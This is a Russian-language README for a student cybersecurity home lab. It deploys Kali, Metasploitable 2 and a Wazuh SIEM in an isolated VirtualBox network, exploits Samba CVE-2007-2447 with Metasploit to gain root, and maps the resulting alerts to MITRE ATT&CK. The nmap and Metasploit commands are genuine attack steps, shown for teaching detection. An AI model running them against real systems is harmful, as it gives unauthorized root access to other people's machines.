
Изолированная AD/Linux лаборатория атак: эксплуатация CVE-2007-2447 через Metasploit, обнаружение с помощью Wazuh SIEM, сопоставленного с MITRE ATT&CK (T1190, T1059)
Проект B.Tech (BTP) | IIIT Pune На основе: «Designing and Implementing an Effective Cybersecurity Home Lab for Detection and Monitoring» — ICCCNT 2023, IIT Delhi
Полностью функциональная домашняя лаборатория по кибербезопасности, развёрнутая на одной машине с использованием бесплатных инструментов с открытым исходным кодом. Лаборатория имитирует реальный жизненный цикл атаки — разведка → эксплуатация → обнаружение — и демонстрирует, как SIEM может обнаруживать атаки и сопоставлять их с фреймворком MITRE ATT&CK в реальном времени.
┌─────────────────────────────────────────────────┐
│ VirtualBox — Internal Network │
│ (cyberlab, 10.0.0.x/24) │
│ │
│ ┌──────────┐ ┌──────────────┐ ┌──────────┐ │
│ │ Kali │ │ Metasploitable│ │ Ubuntu │ │
│ │ 10.0.0.1 │◄─►│ 10.0.0.2 │◄─►│ 10.0.0.3 │ │
│ │ ATTACKER │ │ VICTIM │ │ SIEM │ │
│ └──────────┘ └──────────────┘ └──────────┘ │
└─────────────────────────────────────────────────┘
Host-Only Adapter (192.168.56.103)
→ Wazuh Dashboard access from browser
Создайте внутреннюю сеть с именем cyberlab в VirtualBox. Все три ВМ получают этот адаптер. ВМ Ubuntu/Wazuh получает дополнительный адаптер Host-Only, чтобы вы могли получить доступ к панели управления из браузера.
cyberlab# Edit /etc/network/interfaces
auto eth0
iface eth0 inet static
address 10.0.0.1
netmask 255.255.255.0
sudo systemctl restart networkingcyberlab# Edit /etc/network/interfaces
auto eth0
iface eth0 inet static
address 10.0.0.2
netmask 255.255.255.0
⚠️ Никогда не открывайте Metasploitable 2 в интернет. Он преднамеренно небезопасен.
cyberlab + Host-Only/etc/netplan/01-network-manager-all.yaml):network:
version: 2
renderer: NetworkManager
ethernets:
enp0s3:
addresses:
- 10.0.0.3/24
enp0s8:
dhcp4: true
curl -sO https://packages.wazuh.com/4.7/wazuh-install.sh
sudo bash wazuh-install.sh -a
https://192.168.56.103 (из браузера хоста)Поскольку Metasploitable 2 не может запускать агент Wazuh, настройте пересылку syslog для мониторинга без агента:
На Metasploitable добавьте в /etc/rsyslog.conf:
*.* @10.0.0.3:514
На Wazuh (Ubuntu) включите ввод syslog в /var/ossec/etc/ossec.conf:
<remote>
<connection>syslog</connection>
<port>514</port>
<protocol>udp</protocol>
</remote>
Перезапустите Wazuh: sudo systemctl restart wazuh-manager
# From Kali
nmap -sV -O 10.0.0.2
Ключевые службы, обнаруженные на Metasploitable 2:
Обнаружено 20+ открытых портов. ОС идентифицирована: Linux 2.6.x
Уязвимость: CVE-2007-2447 — внедрение команд Samba usermap_script
Позволяет неаутентифицированное удалённое выполнение кода через некорректные MS-RPC-запросы на Samba 3.0.0–3.0.25rc3.
# From Kali — launch Metasploit
msfconsole
# Inside Metasploit
use exploit/multi/samba/usermap_script
set RHOSTS 10.0.0.2
set LHOST 10.0.0.1
run
# Verify root access
whoami
# Output: root
После эксплуатации Wazuh автоматически обнаружил события и сопоставил их с MITRE ATT&CK:
Всего обнаружено событий: 55+
Откройте панель управления по адресу https://192.168.56.103 → Security Events → MITRE ATT&CK
cybersecurity-home-lab/
│
├── README.md ← You are here
├── network-config/
│ ├── kali-interfaces.txt ← Kali static IP config
│ ├── metasploitable-interfaces.txt
│ └── ubuntu-netplan.yaml ← Ubuntu/SIEM netplan config
├── wazuh-config/
│ └── ossec.conf ← Wazuh syslog/agent config
├── screenshots/
│ ├── nmap-scan.png
│ ├── metasploit-exploit.png
│ ├── wazuh-dashboard.png
│ └── wazuh-alerts-table.png
└── report/
└── ICCCNT_2023_paper.pdf ← Reference research paper
Dadiyala, C. et al. (2023). Designing and Implementing an Effective Cybersecurity Home Lab for Detection and Monitoring. 14th International Conference on Computing, Communication and Networking Technologies (ICCCNT), IIT Delhi. IEEE-56998.
Данная лаборатория полностью построена на изолированных виртуальных машинах без доступа в интернет во время имитации атак. Все инструменты и техники используются строго в образовательных целях в контролируемой среде. Не пытайтесь воспроизводить какие-либо техники атак на системах, которыми вы не владеете или на тестирование которых у вас нет явного разрешения.
Представлено Harshita Verma | IIIT Pune
| ВМ | Роль | IP | Инструменты |
|---|
| Kali Linux 2026.1 | Атакующий | 10.0.0.1 | Nmap, Metasploit |
| Metasploitable 2 | Жертва | 10.0.0.2 | 20+ уязвимостей |
| Ubuntu 22.04 + Wazuh | SIEM | 10.0.0.3 | Wazuh v4.7.5 |
| Инструмент | Версия | Назначение |
|---|
| VirtualBox | 7.x | Гипервизор — запускает все ВМ на одном хосте |
| Kali Linux | 2026.1 | ОС для тестирования на проникновение (наступательная) |
| Metasploitable 2 | v2.0 | Преднамеренно уязвимая цель |
| Wazuh | v4.7.5 | SIEM с открытым исходным кодом (оборонительная) |
| Nmap | Latest | Сканирование сети/портов |
| Metasploit Framework | Latest | Фреймворк для эксплуатации |
| Порт | Служба | Версия |
|---|
| 21/tcp | FTP | vsftpd 2.3.4 |
| 22/tcp | SSH | OpenSSH 4.7p1 |
| 80/tcp | HTTP | Apache 2.2.8 |
| 139/445 | SMB | Samba 3.x–4.x |
| 3306/tcp | MySQL | 5.0.51a |
| 5432/tcp | PostgreSQL | 8.3 |
| Идентификатор правила | Описание | Техника MITRE | Тактика |
|---|
| 5402 | Успешное выполнение sudo до ROOT | T1548.003 | Повышение привилегий |
| 5501 | PAM: открыт сеанс входа | T1078 | Первоначальный доступ / Закрепление |
| 5502 | PAM: закрыт сеанс входа | T1078 | Обход защиты |
| 502 | Сервер Wazuh запущен | — | Обнаружение активно |